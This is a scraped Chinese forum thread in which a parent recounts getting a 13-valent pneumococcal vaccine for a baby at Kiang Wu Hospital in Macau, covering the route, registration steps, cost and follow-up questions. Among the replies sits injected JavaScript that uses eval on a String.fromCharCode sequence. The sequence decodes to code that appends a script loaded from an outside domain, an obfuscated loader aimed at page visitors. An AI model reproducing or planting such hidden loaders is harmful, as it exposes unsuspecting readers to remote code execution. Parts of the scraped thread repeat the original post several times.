帖子详情

分享~~澳门镜湖医院打十三价肺炎疫苗

3409929婴幼育儿

国内13价肺炎疫苗一直没有下文,又唔想等小朋友满2岁先打23价,知道香港澳门有得打,于是就自己上网搜攻略了。妈网上好多分享都系去香港打既,我自己就觉得香港比较大,可能交通都要转几次先到,所以就去澳门打吧!镜湖医院打疫苗噶时间系周一至周五正常上班时间,周六日就上午9点到12点。要带BB噶通行证同埋国内噶疫苗簿,距离上一次打其他疫苗噶时间最好超过10日。早上早早出发,搭广珠城轨到珠海,走特别通道65岁以上或3岁以下,半个钟就过晒两个关口。系关闸公交车站搭17号车到东南小学下车,走到镜湖医院第一门诊挂号(免费的)。第一次去要填份基本资料表,之后就可以去到3楼儿科前台报到,护士会帮BB测量体温,之后就可以坐住等叫号啦,等候过程大概半个钟吧,反正唔系好耐。入到去医生会基本询问一下情况,比疫苗簿距睇,同距讲话系打13价肺炎疫苗就得噶啦,医生同护士噶态度都好好。之后就落翻一楼缴费,一共970葡币,人民币大约800元,好像是比香港便宜的,之前了解香港都是港币1300+。交完费就等叫号打针,护士好好会再核对一次小朋友姓名,打咩针,仲话呢支针会比较痛,要我捉实点BB,打完针系比个棉花球按住再痴胶布,我感觉比我地社区医院用棉签卫生,因为我自己按棉签成日都会郁来郁去。最后护士仲会讲如果小朋友发烧38.5度就要去睇医生啦。打完针我地系澳门行左下就直接翻广州了。
总结一下
1.第一门诊部挂号,第一次要填表,出示通行证
2.3楼儿科报到,测量体温
3.等叫号
4.出示疫苗本,医生开单,缴费
5.打针,等20分钟

镜湖医院儿科电话:0085382958301
ps:澳门道路比较窄,公交车人也比较多,辛苦点也尽量用背带吧,推车确实不太方便!!
精选回帖
拿通行证过去吗?
2016/09/30回复
AlciaAlcia8楼
我也带宝宝上个月去澳门打了第1针13价肺炎疫苗,推车真的不方便啊。我还想打流脑4价,但镜湖医院不提供。楼主打算去哪里接种流脑4价疫苗呢?
2016/10/11回复
mark~
$('ed2k_rWg').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';唔洗预约?
2017/03/28回复
nadun51nadun5117楼
mark~
2017/04/21回复
全部回帖
≥ω≤瀦仕嘜:
国内13价肺炎疫苗一直没有下文,又唔想等小朋友满2岁先打23价,知道香港澳门有得打,于是就自己上网搜攻略了。妈网上好多分享都系去香港打既,我自己就觉得香港比较大,可能交通都要转几次先到,所以就去澳门打吧!镜湖医院打疫苗噶时间系周一至周五正常上班时间,周六日就上午9点到12点。要带BB噶通行证同埋国内噶疫苗簿,距离上一次打其他疫苗噶时间最好超过10日。早上早早出发,搭广珠城轨到珠海,走特别通道65岁以上或3岁以下,半个钟就过晒两个关口。系关闸公交车站搭17号车到东南小学下车,走到镜湖医院第一门诊挂号(免费的)。第一次去要填份基本资料表,之后就可以去到3楼儿科前台报到,护士会帮BB测量体温,之后就可以坐住等叫号啦,等候过程大概半个钟吧,反正唔系好耐。入到去医生会基本询问一下情况,比疫苗簿距睇,同距讲话系打13价肺炎疫苗就得噶啦,医生同护士噶态度都好好。之后就落翻一楼缴费,一共970葡币,人民币大约800元,好像是比香港便宜的,之前了解香港都是港币1300+。交完费就等叫号打针,护士好好会再核对一次小朋友姓名,打咩针,仲话呢支针会比较痛,要我捉实点BB,打完针系比个棉花球按住再痴胶布,我感觉比我地社区医院用棉签卫生,因为我自己按棉签成日都会郁来郁去。最后护士仲会讲如果小朋友发烧38.5度就要去睇医生啦。打完针我地系澳门行左下就直接翻广州了。总结一下1.第一门诊部挂号,第一次要填表,出示通行证2.3楼儿科报到,测量体温3.等叫号4.出示疫苗本,医生开单,缴费5.打针,等20分钟镜湖医院儿科电话:0085382958301ps:澳门道路比较窄,公交车人也比较多,辛苦点也尽量用背带吧,推车确实不太方便!!
查看原文
拿通行证过去吗?
≥ω≤瀦仕嘜:
国内13价肺炎疫苗一直没有下文,又唔想等小朋友满2岁先打23价,知道香港澳门有得打,于是就自己上网搜攻略了。妈网上好多分享都系去香港打既,我自己就觉得香港比较大,可能交通都要转几次先到,所以就去澳门打吧!镜湖医院打疫苗噶时间系周一至周五正常上班时间,周六日就上午9点到12点。要带BB噶通行证同埋国内噶疫苗簿,距离上一次打其他疫苗噶时间最好超过10日。早上早早出发,搭广珠城轨到珠海,走特别通道65岁以上或3岁以下,半个钟就过晒两个关口。系关闸公交车站搭17号车到东南小学下车,走到镜湖医院第一门诊挂号(免费的)。第一次去要填份基本资料表,之后就可以去到3楼儿科前台报到,护士会帮BB测量体温,之后就可以坐住等叫号啦,等候过程大概半个钟吧,反正唔系好耐。入到去医生会基本询问一下情况,比疫苗簿距睇,同距讲话系打13价肺炎疫苗就得噶啦,医生同护士噶态度都好好。之后就落翻一楼缴费,一共970葡币,人民币大约800元,好像是比香港便宜的,之前了解香港都是港币1300+。交完费就等叫号打针,护士好好会再核对一次小朋友姓名,打咩针,仲话呢支针会比较痛,要我捉实点BB,打完针系比个棉花球按住再痴胶布,我感觉比我地社区医院用棉签卫生,因为我自己按棉签成日都会郁来郁去。最后护士仲会讲如果小朋友发烧38.5度就要去睇医生啦。打完针我地系澳门行左下就直接翻广州了。总结一下1.第一门诊部挂号,第一次要填表,出示通行证2.3楼儿科报到,测量体温3.等叫号4.出示疫苗本,医生开单,缴费5.打针,等20分钟镜湖医院儿科电话:0085382958301ps:澳门道路比较窄,公交车人也比较多,辛苦点也尽量用背带吧,推车确实不太方便!!
查看原文
要bb的通行证
唔洗预约?
2016/10/05回复
几个月打?
2016/10/07回复
臭屎麒妈妈:
唔洗预约?
查看原文
5使预约,直接去就得。只要是开诊时间!
2016/10/08回复
晴晴晴晴晴520:
几个月打?
查看原文
两个月就已经可以打了,6个月前打第一针一共打4针。
2016/10/08回复
AlciaAlcia8楼
我也带宝宝上个月去澳门打了第1针13价肺炎疫苗,推车真的不方便啊。我还想打流脑4价,但镜湖医院不提供。楼主打算去哪里接种流脑4价疫苗呢?
mark~
Alcia:
查看原文
这个我还没有研究呢,有知道的妈妈可以分享下!
simo106simo10611楼
Alcia 发表于 2016-10-11 11:43
我也带宝宝上个月去澳门打了第1针13价肺炎疫苗,推车真的不方便啊。我还想打流脑4价,但镜湖医院不提供。楼..
宝妈你好,想问下你后来带宝宝去澳门打四价流脑了吗?谢谢
2017/01/11回复
AlciaAlcia12楼
simo106:
宝妈你好,想问下你后来带宝宝去澳门打四价流脑了吗?谢谢
查看原文
还没呢。目前只能计划去香港接种Nimenrix了,但那边也缺货,暂时预约不到。香港有另外一种Menactra可预约,但要去打两次,我不想打这种。
2017/02/07回复
成人可以去打吗

唔洗预约?
豆豆爱亮亮:
成人可以去打吗
查看原文
成人是打23价吧,国内就有
2017/04/02回复
nadun51nadun5116楼
mark~
2017/04/21回复
2017/08/14回复
joannajoanna18楼
澳门这个13价会不会容易断货丫?还有要不要给诊金?谢谢
2017/08/18回复
拿通行证过去吗?
2017/08/22回复
joanna:
澳门这个13价会不会容易断货丫?还有要不要给诊金?谢谢
查看原文
我去之前都是先打电话的,没有缺货过
2017/10/27回复
猜你喜欢

想打子宫颈癌疫苗自己过香港打,各位妈咪唔好信中介!

在澳门镜湖医院打宫颈疫苗的过程,希望能帮到有用的姐妹们

(完整篇)分享人民中市妇幼的无痛分娩生产记

我家宝宝腋下淋巴结肿大,愁啊~(可能是打卡介苗引起的)

第二次产检(20周)归来。郁闷!

热点推荐

娃上学了吗?广州多区雷暴雨大风预警

家庭月入4.2万 房贷月供1.2万风险高吗

打卡一个遛娃好去处!欢乐舟欢乐遛娃

本周报名!广州4区公布幼儿园招生政策

速速归队!广州妈妈网喊你回家啦

形体课体验 旗袍优雅仪态等你解锁

打卡澳门大三巴牌坊 人实在太多了!

不到1蚊到手酥脆蛋挞 新鲜出炉

精品实体店关门大吉 5折清仓也不便宜

新鲜出炉脏脏包 自己做的味道绝了

粤向群排长龙 杨枝甘露玉米汁好味道

腐乳酱香卤水鸡爪 软糯糯停不下来

下雨天西朗市场打卡 菜价稳定没有升

查看更多热点 >